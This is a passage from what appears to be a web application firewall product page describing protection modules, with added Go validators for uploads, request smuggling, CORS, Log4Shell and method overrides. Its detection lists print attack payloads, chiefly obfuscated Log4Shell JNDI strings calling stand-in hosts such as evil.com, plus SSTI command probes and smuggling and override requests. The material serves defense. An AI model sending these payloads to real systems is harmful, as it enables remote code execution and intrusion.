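	for _, op := range ops {
		d, a := QueryStats(op.Query)
		if d > l.MaxDepth {
			return fmt.Errorf("query depth %d exceeds limit %d", d, l.MaxDepth)
		}
		if a > l.MaxAliases {
			return fmt.Errorf("%d aliases exceed limit %d", a, l.MaxAliases)
		}
		if l.BlockIntrospection && introspectionRe.MatchString(op.Query) {
			return fmt.Errorf("introspection query blocked")
		}
	}
	return nil
}

func main() {
	// Constructed sample body.
	fmt.Println(CheckGraphQLBody([]byte(`{"query":"{ viewer { id } }"}`), DefaultLimits))
}
```

Query cost analysis, which the page lists as configurable, needs the schema's field weights and is not attempted here; the depth, alias and batch caps alone already stop the nested-query and alias-bomb shapes named above.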
Secure File Upload Protection
Blocks malicious file uploads including webshells, malware, and double-extension attacks
Prevents attackers from uploading malicious files that could lead to RCE, XSS, or server compromise.
Blocked File Types
- PHP Files (.php, .php3, .php4, .phtml)
- ASP / ASPX Files (.asp, .aspx, .ashx)
- JSP Files (.jsp, .jspx)
- Executables (.exe, .dll, .msi)
- Shell Scripts (.sh, .bash, .zsh)
- JavaScript HTML (.html, .htm containing scripts)
Detection Techniques
- MIME Type Validation (content-based)
- Extension Whitelist/Blacklist
- Double-Extension Detection (shell.jpg.php)
- Null Byte Poisoning Prevention (.php\x00.jpg)
- Magic Number Verification
- Content Inspection for Malware
- Image Resampling (re-compress uploads)
Security Actions
- Reject dangerous file types
- Sanitize filenames
- Generate random filenames
- Scan with antivirus
- Store outside webroot
- Apply restrictive permissions
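An added example, written for this page rather than taken from the product, showing how the detection techniques above combine in one upload check: every extension in the filename chain is tested against a denylist, the final extension must be on an allowlist, the content is sniffed with Go's `net/http.DetectContentType` (the magic-number check), and the stored name is sanitised. The allowlist, the denylist and the sample files are constructed for the example.

```go
package main

import (
	"fmt"
	"net/http"
	"path"
	"strings"
)

// allowedTypes maps permitted extensions to the MIME type the file content must
// sniff as (net/http.DetectContentType implements the WHATWG sniffing rules).
var allowedTypes = map[string]string{
	".jpg":  "image/jpeg",
	".jpeg": "image/jpeg",
	".png":  "image/png",
	".gif":  "image/gif",
	".pdf":  "application/pdf",
}

// dangerousExt must never appear anywhere in a filename, even as an inner extension
// ("shell.php.jpg"), because some servers execute on any matching extension in the chain.
var dangerousExt = map[string]bool{
	".php": true, ".php3": true, ".php4": true, ".php5": true, ".phtml": true, ".phar": true,
	".asp": true, ".aspx": true, ".ashx": true, ".jsp": true, ".jspx": true,
	".exe": true, ".dll": true, ".msi": true, ".sh": true, ".bash": true, ".zsh": true,
	".html": true, ".htm": true, ".svg": true,
}

// ValidateUpload checks the client-supplied filename and the first bytes of the
// content. It returns the sanitised basename to store under, or an error.
func ValidateUpload(filename string, head []byte) (string, error) {
	if strings.ContainsRune(filename, 0) {
		return "", fmt.Errorf("null byte in filename")
	}
	// Drop any client-supplied directory part (../../etc/passwd, C:\boot.ini).
	base := path.Base(strings.ReplaceAll(filename, "\\", "/"))
	if base == "." || base == "/" || base == "" {
		return "", fmt.Errorf("empty filename")
	}
	parts := strings.Split(strings.ToLower(base), ".")
	if len(parts) < 2 || parts[0] == "" {
		return "", fmt.Errorf("filename needs a name and an extension")
	}
	for _, p := range parts[1:] { // every extension in the chain, not just the last
		if dangerousExt["."+p] {
			return "", fmt.Errorf("dangerous extension .%s", p)
		}
	}
	ext := "." + parts[len(parts)-1]
	want, ok := allowedTypes[ext]
	if !ok {
		return "", fmt.Errorf("extension %s not allowed", ext)
	}
	if got := http.DetectContentType(head); got != want {
		return "", fmt.Errorf("content sniffs as %s, expected %s", got, want)
	}
	// Keep only a conservative character set in the stored name.
	clean := strings.Map(func(r rune) rune {
		if r >= 'a' && r <= 'z' || r >= '0' && r <= '9' || r == '-' || r == '_' || r == '.' {
			return r
		}
		return '_'
	}, strings.ToLower(base))
	return clean, nil
}

func main() {
	// Constructed samples: a real PNG signature, and harmless PHP text wearing a .png name.
	png := []byte{0x89, 'P', 'N', 'G', 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 0x0d, 'I', 'H', 'D', 'R'}
	fmt.Println(ValidateUpload("Holiday Photo.PNG", png))
	fmt.Println(ValidateUpload("fake.png", []byte("<?php echo 'hi'; ?>")))
}
```

Storing under a random server-generated name, as the Security Actions list recommends, is the stronger option; the sanitised name above is what you would keep as display metadata.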
HTTP Request Smuggling Protection
Blocks CL.TE, TE.CL, and TE.TE request smuggling attacks against proxies and load balancers
Prevents attackers from bypassing security controls by sending ambiguous HTTP requests to front-end and back-end servers.
Attack Variants Blocked
- CL.TE (Content-Length vs Transfer-Encoding)
- TE.CL (Transfer-Encoding vs Content-Length)
- TE.TE (Obfuscated Transfer-Encoding)
- Duplicate Content-Length Headers
- Chunked Encoding Smuggling
- Header Folding Attacks
- HTTP/2 to HTTP/1.1 Smuggling
Detection Methods
- Normalize ambiguous headers
- Validate Content-Length values
- Reject conflicting headers
- Parse chunked encoding strictly
- Drop malformed requests
- Log smuggling attempts
- IP blocking for repeat offenders
Protected Components
- Reverse Proxies (Nginx, HAProxy, Envoy)
- Load Balancers (AWS ALB, F5, Citrix)
- Application Servers (Tomcat, IIS, Apache)
- API Gateways (Kong, Traefik, Ambassador)
- CDN Edge Servers (Cloudflare, Fastly, Akamai)
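An added Go example (not CloFix's code) of the strict header validation the detection methods above describe: it parses a raw HTTP/1.x request head and rejects the ambiguous framings, namely Content-Length and Transfer-Encoding both present, duplicate or non-numeric Content-Length, any Transfer-Encoding value other than `chunked`, whitespace or control bytes in header names, and obsolete line folding. The function names and the sample request heads are constructed for the example; HTTP/2 downgrade smuggling is not covered here.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// isToken reports whether s is a valid RFC 7230 header-name token (no spaces, no control bytes).
func isToken(s string) bool {
	if s == "" {
		return false
	}
	for _, r := range s {
		switch {
		case r >= 'a' && r <= 'z', r >= 'A' && r <= 'Z', r >= '0' && r <= '9':
		case strings.ContainsRune("!#$%&'*+-.^_`|~", r):
		default:
			return false
		}
	}
	return true
}

func isDigits(s string) bool {
	if s == "" {
		return false
	}
	for _, r := range s {
		if r < '0' || r > '9' {
			return false
		}
	}
	return true
}

// CheckRequestHead inspects a raw HTTP/1.x request head (everything up to the blank line) and
// returns an error for any framing a front-end and a back-end could interpret differently.
// nil means the message length is unambiguous and the request may be forwarded.
func CheckRequestHead(raw string) error {
	end := strings.Index(raw, "\r\n\r\n")
	if end < 0 {
		return errors.New("incomplete request head")
	}
	lines := strings.Split(raw[:end], "\r\n")
	if f := strings.Fields(lines[0]); len(f) != 3 || !strings.HasPrefix(f[2], "HTTP/1.") {
		return errors.New("malformed request line")
	}
	var cl, te []string
	for _, l := range lines[1:] {
		if l == "" || l[0] == ' ' || l[0] == '\t' {
			return errors.New("obsolete line folding or empty header line")
		}
		if strings.ContainsAny(l, "\r\n") {
			return errors.New("bare CR or LF inside a header line")
		}
		kv := strings.SplitN(l, ":", 2)
		if len(kv) != 2 || !isToken(kv[0]) { // catches "Transfer-Encoding : chunked" and control bytes
			return fmt.Errorf("malformed header name %q", kv[0])
		}
		value := strings.Trim(kv[1], " \t")
		switch strings.ToLower(kv[0]) {
		case "content-length":
			cl = append(cl, value)
		case "transfer-encoding":
			te = append(te, value)
		}
	}
	switch {
	case len(cl) > 0 && len(te) > 0:
		return errors.New("Content-Length and Transfer-Encoding both present (CL.TE / TE.CL)")
	case len(cl) > 1:
		return errors.New("duplicate Content-Length")
	case len(cl) == 1 && !isDigits(cl[0]):
		return fmt.Errorf("non-numeric Content-Length %q", cl[0])
	case len(te) > 1:
		return errors.New("duplicate Transfer-Encoding")
	case len(te) == 1 && strings.ToLower(te[0]) != "chunked":
		return fmt.Errorf("obfuscated or unsupported Transfer-Encoding %q (TE.TE)", te[0])
	}
	return nil
}

func main() {
	// Constructed request heads: the first is clean, the second carries both length headers.
	for _, req := range []string{
		"POST /api HTTP/1.1\r\nHost: app.example.com\r\nContent-Length: 5\r\n\r\nhello",
		"POST /api HTTP/1.1\r\nHost: app.example.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
	} {
		fmt.Println(CheckRequestHead(req))
	}
}
```

Rejecting rather than normalising is the safer choice at a front-end: a proxy that silently picks one of two conflicting headers is exactly the disagreement these attacks exploit, so a request with ambiguous framing should be dropped and logged as the page's detection methods list suggests.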
Server-Side Template Injection Protection
Prevents SSTI attacks that could lead to RCE in templating engines
Blocks template injection attacks targeting Jinja2, Twig, Freemarker, Velocity, ERB, and other templating engines.
Protected Template Engines
- Jinja2 / Django (Python)
- Twig / Smarty (PHP)
- Freemarker / Velocity (Java)
- ERB (Ruby)
- Handlebars / Mustache (JavaScript)
- Pug / Jade (Node.js)
- Go Templates
Detected Attack Patterns
- {{ config.items() }} - Config Access
- {{ self.__class__ }} - Object Traversal
- ${7*7} - Expression Evaluation
- {{7*7}} - Encoded Expression
- <%= system('id') %> - Code Execution
- {php}system('id');{/php} - PHP Injection
Protection Techniques
- Sandboxed Template Rendering
- Disable Dangerous Functions
- Input Sanitization
- Context-Aware Escaping
- Template Whitelisting
- Expression Depth Limiting
CORS Abuse Protection
Prevents Cross-Origin Resource Sharing misconfigurations and abuse attacks
Blocks malicious cross-origin requests exploiting permissive CORS policies and credential leakage.
π― Attack Vectors Blocked
- Wildcard Origin with Credentials (
Access-Control-Allow-Origin: *with credentials) - Null Origin Abuse (
Origin: null) - Reflected Origin Headers
- Private IP Origin Attacks
- Subdomain Origin Spoofing
- Preflight Cache Poisoning
- CORS Misconfiguration Exploitation
Protection Features
- Origin Whitelist Validation
- Block Credentials with Wildcard Origin
- Reject Null Origin
- Validate Preflight Requests
- Restrict Dangerous Methods
- Limit Exposed Headers
- Cache Control for Preflight
Security Headers Applied
- Access-Control-Allow-Origin (restrictive)
- Access-Control-Allow-Credentials (conditional)
- Access-Control-Allow-Methods (limited)
- Access-Control-Allow-Headers (whitelist)
- Access-Control-Max-Age (capped)
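The protection features and header policy above, as an added Go example (not CloFix code): an exact-match origin allowlist that never reflects the request's Origin, rejects "null", caps preflight caching, and an audit of a backend's response headers for the wildcard-plus-credentials misconfiguration. The policy struct, the 600 second cap and the allowlist entries are assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"strconv"
	"strings"
)

// corsPolicy is an allowlist-based policy (assumed structure).
type corsPolicy struct {
	origins map[string]bool // exact lowercase origins, e.g. "https://app.example.com"
	methods string          // limited method list advertised to browsers
	headers string          // header allowlist advertised to browsers
	maxAge  int             // cap on preflight caching, in seconds
}

func newCORSPolicy(origins []string, methods, headers string, maxAge int) corsPolicy {
	p := corsPolicy{origins: map[string]bool{}, methods: methods, headers: headers, maxAge: maxAge}
	for _, o := range origins {
		p.origins[strings.ToLower(o)] = true
	}
	if p.maxAge > 600 { // assumed cap so a revoked origin stops working quickly
		p.maxAge = 600
	}
	return p
}

// grant returns the CORS headers to emit for a request's Origin value, or an
// empty map when no cross-origin grant must be made. The origin is never
// reflected: only an exact allowlist match is echoed back.
func (p corsPolicy) grant(origin string) map[string]string {
	out := map[string]string{}
	if origin == "" {
		return out // same-origin or non-browser client: no CORS headers needed
	}
	if origin == "null" {
		return out // sandboxed iframes, file:// and some redirects send "null"; never trust it
	}
	u, err := url.Parse(origin)
	if err != nil || (u.Scheme != "https" && u.Scheme != "http") || u.Host == "" || u.Path != "" || u.RawQuery != "" {
		return out // not a well-formed scheme://host[:port] origin
	}
	key := strings.ToLower(origin)
	if !p.origins[key] {
		return out // https://app.example.com.evil.net fails the exact match
	}
	out["Access-Control-Allow-Origin"] = key
	out["Access-Control-Allow-Credentials"] = "true" // only ever paired with an exact origin
	out["Access-Control-Allow-Methods"] = p.methods
	out["Access-Control-Allow-Headers"] = p.headers
	out["Access-Control-Max-Age"] = fmt.Sprint(p.maxAge)
	out["Vary"] = "Origin" // keeps shared caches from serving one origin's grant to another
	return out
}

// auditCORSResponse flags the misconfigurations listed above in a backend's
// response headers so a proxy can strip them or alert before they reach a browser.
func auditCORSResponse(h http.Header) []string {
	var findings []string
	acao := h.Get("Access-Control-Allow-Origin")
	creds := strings.EqualFold(h.Get("Access-Control-Allow-Credentials"), "true")
	if acao == "*" && creds {
		findings = append(findings, "wildcard origin combined with credentials")
	}
	if strings.EqualFold(acao, "null") {
		findings = append(findings, "null origin allowed")
	}
	if n, _ := strconv.Atoi(h.Get("Access-Control-Max-Age")); n > 600 {
		findings = append(findings, "preflight cache lifetime exceeds cap")
	}
	return findings
}

func main() {
	p := newCORSPolicy([]string{"https://app.example.com"}, "GET, POST", "Content-Type", 86400)
	for _, o := range []string{"https://app.example.com", "null", "https://app.example.com.evil.net"} {
		fmt.Printf("%-35s -> %v\n", o, p.grant(o))
	}
	weak := http.Header{"Access-Control-Allow-Origin": {"*"}, "Access-Control-Allow-Credentials": {"true"}}
	fmt.Println("audit:", auditCORSResponse(weak))
}
```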
ClickJacking Protection
Prevents UI redress attacks that trick users into clicking hidden elements
Blocks clickjacking attempts by enforcing frame-busting headers and detecting framing attacks.
Protection Headers Applied
- X-Frame-Options: SAMEORIGIN or DENY
- Content-Security-Policy: frame-ancestors 'self'
- Frame-Options for legacy browsers
Attack Vectors Blocked
- Invisible IFrame Overlays
- Cursor Jacking
- Drag-and-Drop Jacking
- Touch Screen Jacking (Mobile)
- Form Grabbing
- Token Extraction via Frames
- Session Riding
Detection Capabilities
- Frame-Busting Detection
- Cross-Origin Frame Detection
- Referrer Analysis
- User-Agent Context Analysis
- Mobile Viewport Analysis
WebSocket Abuse Protection
Secures WebSocket connections against abuse, flooding, and cross-origin attacks
Protects WebSocket endpoints from connection flooding, cross-origin hijacking, and protocol abuse.
Attack Vectors Blocked
- Cross-Origin WebSocket Connections
- WebSocket Connection Flooding
- Message Flooding (DoS)
- Oversized Frame Attacks
- Invalid Frame Type Injection
- Protocol Downgrade Attacks
- WebSocket Tunnel Abuse
Protection Features
- Origin Validation
- Connection Rate Limiting
- Message Rate Limiting
- Frame Size Limits
- Protocol Whitelisting
- Authentication Required
- Automatic Connection Cleanup
Rate Limits (configurable)
- Max Connections per IP: 10
- Max Messages per Second: 100
- Max Frame Size: 64KB
- Idle Timeout: 60 seconds
- Handshake Timeout: 5 seconds
API Abuse Protection
Comprehensive API security including rate limiting, schema validation, and abuse detection
Protects REST and GraphQL APIs from abuse, scraping, brute force, and business logic attacks.
Protected API Types
- REST APIs (JSON, XML, Form)
- GraphQL APIs
- SOAP Web Services
- gRPC endpoints
- Webhook endpoints
- OAuth/OIDC endpoints
Protection Features
- Rate Limiting (per IP, per API key, per endpoint)
- API Key Validation
- JWT Token Validation
- Request Schema Validation
- Response Schema Validation
- SQL Injection Protection for APIs
- XXE Protection for XML APIs
- Parameter Pollution Detection
- Payload Size Limits
- Request Throttling
Rate Limit Configuration
- Public endpoints: 60 req/min
- Authenticated endpoints: 600 req/min
- Admin endpoints: 600 req/min
- Login endpoint: 10 req/min
- OTP endpoint: 5 req/min
- File upload: 10 req/hour
HTTP Method Spoofing Protection
Blocks HTTP method override attacks that bypass security controls
Prevents attackers from using HTTP method override headers to bypass security restrictions.
Blocked Headers
- X-HTTP-Method-Override
- X-HTTP-Method
- X-Method-Override
- X-Original-Method
- _method (query parameter)
Blocked Spoofing Attempts
- GET to POST (circumventing CSRF)
- GET to DELETE (data deletion)
- GET to PUT (data modification)
- POST to DELETE (auth bypass)
- Invalid HTTP Methods
Host Header Injection Protection
Prevents host header attacks including cache poisoning, password reset poisoning, and SSRF
Blocks attackers from manipulating the Host header to poison caches, bypass virtual host routing, or launch password reset poisoning attacks.
Attack Vectors Blocked
- Cache Poisoning via Host Header
- Password Reset Poisoning
- Virtual Host Bypass
- Web Cache Deception
- DNS Rebinding via Host
- XSS via Host Reflection
Protection Mechanisms
- Host Whitelist Validation
- Duplicate Host Header Blocking
- Localhost/Private IP Blocking
- CRLF Injection Prevention
- Port Stripping & Validation
HTTP Response Splitting Protection
Prevents CRLF injection attacks that split HTTP responses and enable XSS
Blocks CRLF (Carriage Return Line Feed) injection attacks that split HTTP response headers and enable cross-site scripting.
Attack Vectors Blocked
- CRLF Injection (\r\n)
- LF Injection (\n)
- URL Encoded CRLF (%0d%0a)
- Double Encoding (%250d%250a)
- Set-Cookie Injection
- Redirect Splitting
Protected Headers
Referer, User-Agent, Location, Cookie, X-Forwarded-For, Origin, Host
MIME Sniffing Protection
Prevents browsers from interpreting files as executable content types
Forces browsers to respect declared MIME types, preventing XSS via MIME type confusion attacks.
Protection Applied
- X-Content-Type-Options: nosniff header
- Content-Type validation on uploads
- MIME mismatch detection (an image/* type declared for HTML content)
- Executable content blocking in text contexts
Attack Vectors Blocked
- HTML disguised as images
- CSS disguised as text/plain
- JSON with HTML injection
- SVG with script execution
Content-Type Enforcement
Enforces strict Content-Type headers for API endpoints
Ensures API endpoints receive expected Content-Type headers, preventing confusion attacks.
Enforced Types
- JSON APIs → application/json
- XML APIs → application/xml or text/xml
- Form APIs → application/x-www-form-urlencoded
- File Upload → multipart/form-data
Charset Validation
- Only UTF-8, ISO-8859-1, Windows-1252 allowed
- Block UTF-7, UTF-16, UTF-32 (encoding attacks)
- Charset normalization
Unicode Homograph Protection
Prevents IDN homograph attacks that use visually similar Unicode characters
Blocks attackers from using visually identical Unicode characters to create phishing domains and URLs.
Blocked Character Sets
- Cyrillic (looks like Latin)
- Greek characters
- Fullwidth characters
- Superscript/Subscript numbers
- Letter-like symbols
- Combining characters
Detection Examples
- аpple.com (Cyrillic 'а') vs apple.com
- gοοgle.com (Greek 'ο') vs google.com
- paypaI.com (Fullwidth 'I') vs paypal.com
API Schema Validation
Validates API requests against OpenAPI/JSON Schema definitions
Ensures API requests conform to declared schemas, preventing malformed and attack payloads.
Validation Types
- JSON Schema Validation (required fields, types, formats)
- OpenAPI/Swagger compliance
- Parameter validation (query, path, header)
- Request body validation
- Response schema validation
Schema Enforcement
- Required field checking
- Data type validation (string, number, boolean, array, object)
- String pattern validation (email, uuid, date, regex)
- Number range validation (minimum, maximum)
- Array length validation (minItems, maxItems, uniqueItems)
- Enum value validation
Host Header Validation
Validates Host header against allowed domains and blocks injections
Strictly validates the Host header against configured allowed domains.
Validation Rules
- Host must match configured domains
- Block localhost and private IPs in Host header
- Block suspicious characters (%00, \r, \n, ../)
- Reject multiple Host headers
- Normalize port stripping
Subdomain Takeover Protection
Detects and prevents dangling DNS records pointing to unclaimed cloud services
Prevents attackers from claiming abandoned subdomains pointing to external cloud services (S3 buckets, GitHub Pages, Heroku, Azure, etc.) for phishing, XSS, or session hijacking.
Monitored Cloud Services
- AWS S3 Buckets (dangling bucket takeover)
- GitHub Pages (unclaimed repository)
- Heroku Apps (deleted/unclaimed apps)
- Azure CDN / Storage
- Google Cloud Storage
- DigitalOcean Spaces
- Shopify (unclaimed stores)
- WordPress.com (unclaimed blogs)
- Zendesk (unclaimed helpdesk)
- Campaign Monitor (unclaimed accounts)
- Freshdesk (unclaimed support)
- SendGrid (unclaimed email services)
Protection Mechanisms
- CNAME Record Monitoring & Alerting
- Dead DNS Entry Detection
- Automatic Subdomain Health Checks
- Orphaned Resource Detection
- DNS Response Validation
- Cloud Service Takeover Detection
- Subdomain Fingerprint Tracking
- Periodic DNS Audit
Detected Vulnerable Patterns
- CNAME to expired S3 bucket → s3-website-us-east-1.amazonaws.com not resolving
- CNAME to unclaimed Heroku → yourapp.herokuapp.com shows "No such app"
- CNAME to GitHub Pages with no repository
- MX records pointing to dead email services
- NS records pointing to unclaimed subdomains
- TXT records with dangling verification tokens
Security Actions
- Alert on suspicious CNAME resolution failures
- Block requests to dangling subdomains
- Automatic SSL Certificate validation
- DNS Record Expiry Monitoring
- Takeover Attempt Logging
- Instant Email/Slack/FCM Notification
- Automated DNS Cleanup Recommendations
Log4Shell (CVE-2021-44228) Protection
Blocks JNDI injection attacks targeting Log4j vulnerabilities
Blocks all variants of the Log4Shell exploit (CVE-2021-44228) that allow Remote Code Execution via JNDI injection in log messages.
Attack Patterns Blocked
- Basic JNDI: ${jndi:ldap://evil.com/exploit}
- Lowercase Bypass: ${jndi:${lower:l}${lower:d}ap://evil.com}
- Upper/Lower Mix: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}
- Environment Variables: ${${env:JNDI:-j}ndi:ldap://evil.com}
- Nested Variables: ${${web:jndi}${web:ldap:}evil.com}
- Base64 Encoded: ${${base64:am5kaQ==}:ldap://evil.com}
- DNS Lookup: ${jndi:dns://evil.com}
- RMI Protocol: ${jndi:rmi://evil.com/exploit}
- IIOP Protocol: ${jndiiop://evil.com}
- LDAPS Protocol: ${jndi:ldaps://evil.com}
- CORBA Protocol: ${jndi:corbaname:evil.com}
- Remote/Local Mix: ${${ctx:jndi}${ctx:ldap}://evil.com}
Detection Techniques
- Regex-based JNDI Pattern Matching
- Multi-layer Nested Expression Decoding
- Environment Variable Interpolation Detection
- Lowercase/Environment/Base64 Bypass Detection
- All HTTP Headers Scanning (User-Agent, Referer, X-Forwarded-For, Cookie, Authorization, etc.)
- Query String Parameter Inspection
- POST Body (JSON, XML, Form) Scanning
- Path Parameter Validation
- WebSocket Message Inspection
Protected Vectors
- HTTP Headers: User-Agent, Referer, X-Forwarded-For, X-Real-IP, Cookie, Authorization, Origin
- Query Parameters: All URL parameters
- Request Body: JSON, XML, Form data, Multipart uploads
- URL Path: Path segments, file extensions
- Uploaded Files: Filename, content inspection
- WebSocket: Message frames
Security Actions
- Immediate request blocking on JNDI pattern match
- IP-based blocking with nftables/firewall
- Fingerprint-based rate limiting
- Automatic attack logging to ClickHouse
- Real-time alerts (Slack, Email, FCM, WebSocket)
- Suspicious pattern scoring system
- WAF bypass attempt detection
Example Blocked Payloads
${jndi:ldap://attacker.com/Exploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com}
${${env:JNDI:-j}ndi${env:JNDI:-:}${env:JNDI:-l}dap://malicious.com}
${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}${lower:d}${lower:a}${lower:p}://hack.com}
${jndi:${lower:l}${upper:d}a${::-p}://exploit.com/payload}
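The "multi-layer nested expression decoding" technique from the detection list, as an added Go example (not CloFix code): it resolves the lookup forms used for obfuscation from the inside out (lower, upper, base64 and the ":-default" syntax), then matches the exposed JNDI lookup, and additionally scores nested lookups whose inner values could only be resolved on the target. The scheme list, the 16-layer bound and the nesting rule are assumptions.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// innermost matches a ${...} expression containing no nested braces, so
// repeated replacement peels a payload from the inside out.
var innermost = regexp.MustCompile(`\$\{[^{}]*\}`)

// jndiRe matches a JNDI lookup once obfuscation has been removed (assumed scheme list).
var jndiRe = regexp.MustCompile(`(?i)\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corbaname|nis|nds|https?)`)

type log4shellVerdict struct {
	Block      bool   // final decision
	Decoded    string // input after all resolvable lookups were applied
	Layers     int    // how many nesting layers were peeled
	Unresolved int    // lookups whose value depends on the target (env, ctx, sys, web ...)
}

// resolveLookup emulates the small set of Log4j lookups used for obfuscation.
func resolveLookup(expr string, unresolved *int) string {
	body := expr[2 : len(expr)-1]
	if i := strings.Index(body, ":-"); i >= 0 {
		return body[i+2:] // ${env:JNDI:-j} and ${::-j} both yield the default "j"
	}
	prefix, arg, ok := strings.Cut(body, ":")
	if !ok {
		return "" // ${user}: an unknown bare lookup contributes nothing
	}
	switch strings.ToLower(prefix) {
	case "lower":
		return strings.ToLower(arg)
	case "upper":
		return strings.ToUpper(arg)
	case "base64":
		if b, err := base64.StdEncoding.DecodeString(arg); err == nil {
			return string(b)
		}
	}
	*unresolved++
	return "?" // placeholder for a value the edge cannot know
}

// detectLog4Shell peels nested lookups (bounded) and blocks on a JNDI match or
// on a lookup nested inside another lookup with target-dependent inner values.
func detectLog4Shell(input string) log4shellVerdict {
	v := log4shellVerdict{Decoded: input}
	for i := 0; i < 16; i++ {
		if jndiRe.MatchString(v.Decoded) {
			v.Block = true
			return v
		}
		next := innermost.ReplaceAllStringFunc(v.Decoded, func(m string) string {
			return resolveLookup(m, &v.Unresolved)
		})
		if next == v.Decoded {
			break
		}
		v.Decoded = next
		v.Layers++
	}
	// ${${ctx:jndi}${ctx:ldap}://evil.com}: nothing recognisable survives decoding,
	// but legitimate input does not nest target-dependent lookups (assumed rule).
	if v.Layers >= 2 && v.Unresolved > 0 {
		v.Block = true
	}
	return v
}

func main() {
	samples := []string{ // constructed: the page's shapes plus a benign User-Agent
		"${jndi:ldap://attacker.com/Exploit}",
		"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com}",
		"${${ctx:jndi}${ctx:ldap}://evil.com}",
		"Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/115.0",
	}
	for _, s := range samples {
		v := detectLog4Shell(s)
		fmt.Printf("block=%-5v layers=%d decoded=%q\n", v.Block, v.Layers, v.Decoded)
	}
}
```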
HTTP Verb Tampering Protection
Blocks arbitrary and overridden HTTP methods bypassing ACL restrictions
Prevents attackers from using HTTP method override headers to bypass authentication, authorization, and security controls.
Attack Patterns Blocked
- X-HTTP-Method-Override header injection
- X-HTTP-Method override attacks
- X-Method-Override header abuse
- X-Original-Method spoofing
- _method query parameter override
- method parameter in POST body
- HTTP/2 pseudo-header manipulation
- Custom method injection
Bypass Scenarios Blocked
- GET to POST: Circumventing CSRF tokens
- GET to DELETE: Unauthorized data deletion
- GET to PUT/PATCH: Data modification without permission
- POST to DELETE: Privilege escalation via method change
- HEAD to POST: Web cache deception attacks
- Invalid HTTP methods: ACK, BUG, FIND, etc.
- Verb-based access control bypass: When only GET is allowed but POST is overridden
Protection Mechanisms
- HTTP Method Whitelist Enforcement (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)
- Override Header Detection & Blocking
- Method Normalization
- Consistent Method Validation Across All Endpoints
- Per-Endpoint Method Restriction
- Invalid Method Rejection (405)
- Method Spoofing Alerting
- Security Header Enforcement (X-HTTP-Method-Override: block)
Configuration Options
- Allowed Methods per Path (e.g., /api/ POST, PUT, DELETE allowed)
- Override Header Block Policy (block or strip)
- Method Validation Strictness Level
- Custom Method Allowlist
- Admin-Only Method Restriction
Example Blocked Requests
GET /admin/users/123 HTTP/1.1
X-HTTP-Method-Override: DELETE
POST /api/payment HTTP/1.1
X-Method-Override: GET
GET /profile/edit?_method=PUT HTTP/1.1
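The override-header, parameter and per-path whitelist checks described in this section and in the HTTP Method Spoofing section above, as an added Go example (not CloFix code). The per-path policy, the 403/405 split and the request samples are assumptions; the override header names come from the lists above.

```go
package main

import (
	"fmt"
	"net/http"
	"strings"
)

// Override mechanisms from the list above; their mere presence is rejected.
var overrideHeaders = []string{"X-HTTP-Method-Override", "X-HTTP-Method", "X-Method-Override", "X-Original-Method"}

// methodPolicy maps a path prefix to its allowed methods (assumed config shape).
type methodPolicy struct {
	global  map[string]bool            // the whitelist from the list above
	perPath map[string]map[string]bool // longest matching prefix wins
}

func methodSet(ms ...string) map[string]bool {
	m := map[string]bool{}
	for _, x := range ms {
		m[x] = true
	}
	return m
}

func newMethodPolicy() methodPolicy {
	return methodPolicy{
		global: methodSet("GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"),
		perPath: map[string]map[string]bool{ // assumed per-endpoint restrictions
			"/admin/":   methodSet("GET"),
			"/api/":     methodSet("GET", "POST", "PUT", "DELETE"),
			"/profile/": methodSet("GET", "POST"),
		},
	}
}

// check returns the HTTP status to answer with, or 0 when the request may pass:
// 403 for any override header or parameter, 405 for invalid, non-canonical or
// path-restricted methods.
func (p methodPolicy) check(r *http.Request) (int, string) {
	for _, h := range overrideHeaders {
		if r.Header.Get(h) != "" {
			return http.StatusForbidden, "override header present: " + h
		}
	}
	_ = r.ParseForm() // fills Query and PostForm; a missing body is not an error we act on
	if r.URL.Query().Get("_method") != "" || r.PostForm.Get("_method") != "" || r.PostForm.Get("method") != "" {
		return http.StatusForbidden, "method override parameter present"
	}
	m := r.Method
	if m != strings.ToUpper(m) || !p.global[m] { // method normalization + whitelist
		return http.StatusMethodNotAllowed, "method not in whitelist: " + m
	}
	best := ""
	for prefix := range p.perPath {
		if strings.HasPrefix(r.URL.Path, prefix) && len(prefix) > len(best) {
			best = prefix
		}
	}
	if best != "" && !p.perPath[best][m] {
		return http.StatusMethodNotAllowed, fmt.Sprintf("%s not allowed under %s", m, best)
	}
	return 0, ""
}

func main() {
	p := newMethodPolicy()
	r1, _ := http.NewRequest("GET", "http://h/admin/users/123", nil)
	r1.Header.Set("X-HTTP-Method-Override", "DELETE")
	r2, _ := http.NewRequest("GET", "http://h/profile/edit?_method=PUT", nil)
	r3, _ := http.NewRequest("GET", "http://h/api/items", nil)
	for _, r := range []*http.Request{r1, r2, r3} {
		code, why := p.check(r)
		fmt.Printf("%s %s -> %d %s\n", r.Method, r.URL.RequestURI(), code, why)
	}
}
```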
Mass Assignment Protection
Blocks privilege escalation attempts via hidden JSON body parameters
Prevents attackers from modifying protected model attributes by injecting extra fields in JSON/Form requests (Mass Assignment/RBAC bypass vulnerabilities).
Protected Sensitive Fields
- Role/Privilege Fields: role, roles, is_admin, isAdmin, admin, privilege, permissions
- Account Control: is_active, is_verified, status, account_status, locked
- Database Fields: _id, __v, createdAt, updatedAt, version
- Financial Fields: balance, credits, subscription_tier, plan
- Password Fields: password, password_confirmation, current_password
- Auth Fields: api_key, access_token, refresh_token, session_id
- MongoDB Prototype Pollution: __proto__, constructor, prototype
- Nested Object Injection: user[role], data.isAdmin, profile.privileges
Detection Techniques
- Deep JSON Body Scanning (recursive object traversal)
- Form Parameter Inspection (multipart, URL-encoded)
- Query String Parameter Analysis
